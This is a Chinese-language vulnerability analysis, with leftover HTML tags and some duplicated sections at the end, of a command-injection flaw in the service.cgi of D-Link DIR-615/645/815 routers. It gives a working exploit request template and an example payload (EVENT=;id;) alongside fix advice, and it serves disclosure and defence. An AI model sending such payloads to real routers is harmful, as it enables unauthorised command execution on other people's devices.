D-Link DIR 615\/645\/815 service.cgi远程命令执行漏洞分析<\/h1>

漏洞概述<\/h2>
D-Link DIR-615、DIR-645和DIR-815系列路由器存在一个严重的远程命令执行漏洞，该漏洞存在于service.cgi组件中，允许攻击者通过构造特殊的HTTP请求在设备上执行任意命令。<\/p>

漏洞影响版本<\/h2>

DIR-615 1.03及之前版本<\/li>
DIR-645 1.03及之前版本<\/li>

DIR-815 1.03及之前版本<\/li> <\/ul>

漏洞分析<\/h2>

固件获取<\/h3>

可以从官方固件仓库下载受影响版本的固件：<\/p>

Index of \/pub\/Router\/DIR-815\/Firmware\/RevA
<\/code><\/pre>
固件分析工具<\/h3>
使用binwalk工具进行固件分析：<\/p>
binwalk -Me firmware.bin
<\/span><\/span><\/code><\/pre>漏洞定位<\/h3>

分析发现漏洞存在于htdocs目录下的cgibin文件中<\/li>
关键函数为servicecgi_main<\/code>，该函数检查传入的第一个参数argv[0]<\/code><\/li>
函数会根据请求方式(GET\/POST)进行不同处理<\/li>
<\/ol>
漏洞触发条件<\/h3>

必须使用POST请求方式(GET请求不会进入存在漏洞的分支)<\/li>
需要设置正确的CONTENT_TYPE<\/code>头：
application\/x-www-form-urlencoded
<\/code><\/pre>
<\/li>
<\/ol>
漏洞原理<\/h3>

程序对用户输入的环境变量EVENT<\/code>参数未进行充分过滤<\/li>
攻击者可以通过在EVENT<\/code>参数中插入特殊字符(如分号)来拼接命令<\/li>
最终通过system()<\/code>函数执行拼接后的命令<\/li>
<\/ol>
关键代码分析<\/h3>

程序首先调用cgibin_parse_request<\/code>函数处理请求<\/li>
对URL进行分割，获取问号后的参数(v12)<\/li>
进一步分割参数，检查是否存在=<\/code>和&<\/code><\/li>
比较CONTENT_TYPE<\/code>环境变量：

前0xc字节匹配application\/<\/code><\/li>
后面0x15字节匹配x-www-form-urlencoded<\/code><\/li>
<\/ul>
<\/li>
当匹配到EVENT<\/code>字符串时，会将参数值拼接进system<\/code>函数执行<\/li>
<\/ol>
漏洞利用<\/h2>
利用方式<\/h3>
构造如下形式的POST请求：<\/p>
POST \/service.cgi HTTP\/1.1
Host: target_ip
Content-Type: application\/x-www-form-urlencoded
Content-Length: [length]

EVENT=;{command};
<\/code><\/pre>
其中{command}<\/code>替换为要执行的任意命令。<\/p>
利用示例<\/h3>
执行id<\/code>命令：<\/p>
POST \/service.cgi HTTP\/1.1
Host: 192.168.0.1
Content-Type: application\/x-www-form-urlencoded
Content-Length: 12

EVENT=;id;
<\/code><\/pre>
修复建议<\/h2>

升级到最新固件版本(1.03之后版本)<\/li>
在无法升级的情况下，可以考虑：

禁用远程管理功能<\/li>
配置防火墙规则限制对路由器的访问<\/li>
修改默认管理密码<\/li>
<\/ul>
<\/li>
<\/ol>
参考链接<\/h2>

国家信息安全漏洞共享平台官方报告<\/li>
D-Link官方安全公告<\/li>
<\/ul>

D-Link DIR 615\/645\/815 service.cgi远程命令执行漏洞分析<\/h1>

漏洞概述<\/h2> D-Link DIR-615、DIR-645和DIR-815系列路由器存在一个严重的远程命令执行漏洞，该漏洞存在于service.cgi组件中，允许攻击者通过构造特殊的HTTP请求在设备上执行任意命令。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

参考链接<\/h2> 国家信息安全漏洞共享平台官方报告<\/li> D-Link官方安全公告<\/li> <\/ul>

漏洞概述<\/h2>
D-Link DIR-615、DIR-645和DIR-815系列路由器存在一个严重的远程命令执行漏洞，该漏洞存在于service.cgi组件中，允许攻击者通过构造特殊的HTTP请求在设备上执行任意命令。<\/p>

参考链接<\/h2>

国家信息安全漏洞共享平台官方报告<\/li>
D-Link官方安全公告<\/li> <\/ul>